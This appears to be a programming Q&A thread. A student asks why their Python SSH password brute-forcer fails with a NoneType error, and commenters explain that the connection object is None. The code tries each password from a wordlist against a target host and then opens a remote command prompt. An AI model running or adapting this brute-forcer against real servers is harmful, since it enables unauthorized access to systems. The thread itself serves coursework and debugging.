# AttributeError: 'NoneType' object has no attribute 'sendline' yet module contains the attribute having tested it another way?

Tags: python, ssh, pxssh

After importing the relevant libraries and creating a connect function using the pxssh library, I have created my main function to accept the arguments of 'host, 'user' and the filename that I give.

The program successfully reads the file and parses each password string into the s.login method and returns 'success' message after finding the password. This I assume means that the connection has been made with the ssh server. But from the point of 'con = connect' I get no print statement to say that [SSH connected...] further than that I get the command line prompt after it successfully finds the password but after entering a command I get an attribute error against con.sendline -

```
>ls -l
Traceback (most recent call last):
  File "sshBruteFpw.py", line 60, in <module>
    main()
  File "sshBruteFpw.py", line 52, in main
    con.sendline(command)
AttributeError: 'NoneType' object has no attribute 'sendline'
root@kali:~/Desktop/scripts#
```

I am at a loss as to why con.sendline has no attribute 'sendline' when I know that the library contains this method. I have tested this sendline method in other ways and it will work.

Any help on this much appreciated. Thanks in advance...

```
    import pxssh
    import argparse 
    import time 
    import sys 
    import getpass

    def connect(host, user, password):
    Fails = 0 

    try: 

        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] password found! ' + password
        return s 
    except Exception, e:
        if Fails > 5:
            print '[-] Too many Socket Timeouts!!' 
            sys.exit(1) 
        elif 'read_nonblocking' in str(e): 
            Fails += 1
            time.sleep(5)
            return connect(host, user, password)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            return connect(host, user, password)
        return None 


   def main(): 
    parser = argparse.ArgumentParser()
    parser.add_argument('host', help='Specify Target Host')
    parser.add_argument('user', help='Specify Target User')
    parser.add_argument('file', help='Specify Password File')
    args = parser.parse_args()

    if args.host and args.user and args.file: #if these args are all true 
        with open(args.file, 'r') as infile:  #open with and read only the specified file as 'infile'  
            for line in infile: 
                password = line.strip('\r\n')#read and strip each line
                print "[+] testing passsword " + str(password) #print statement + the read PW being read from the file(converts all to str in case there is a numerical value as well)
                con = connect(args.host, args.user, password)
            if con: #if we get a connection 
                print "[+] [SSH Connected, Issue Commands (q or Q) to quit]" #just shows uset that they have made a connection and know how to quit
            command = raw_input(">") 
            while command != 'q' and command != 'Q': 
                con.sendline(command)
                con.prompt()
                print con.before
                command = raw_input(">")
    else: 
            print parser.usage
            sys.exit(1)
if __name__ == '__main__':
    main()
```

Comment: not sure if this has occurred as a result of uploading to SO, but your indentation seems a little off. Could you check it matches what's in your file?

Comment: Hum, looking at your code plus filename: `File "sshBruteFpw.py"`... what are you trying to do? Do you want help to write a script to brute force ssh servers?

Comment: Yes its for an assignment at university - don't panic, its part of a degree in cyber security. Many books available on this subject. thought this forum might help with actual coding issue. Thanks.

Comment: Read the error message closely. It doesn't mean that you have a valid connection object that is missing an attribute, it means that your connection object is `None`. _that's_ the problem. Ask yourself, "why is `con` `None`?"

Comment: Hi Bryan, Many thanks for your advice and help. It had occurred that 'con' needs to be set as a global variable, which I tried but this did not help? I can see there might be an issue with 'con' being assigned the whole 'connect' function but this seems reasonable?

Answer (score 0):

Unless the indentation is very off, you are going into that branch of the code, even if you don't have `con` set up:

```
        if con: #if we get a connection 
            print "[+] [SSH Connected, Issue Commands (q or Q) to quit]" #just shows uset that they have made a connection and know how to quit
        command = raw_input(">") 
        while command != 'q' and command != 'Q': 
            con.sendline(command)
```

after the second line, there should be `continue`, if the connection failed, isn't it?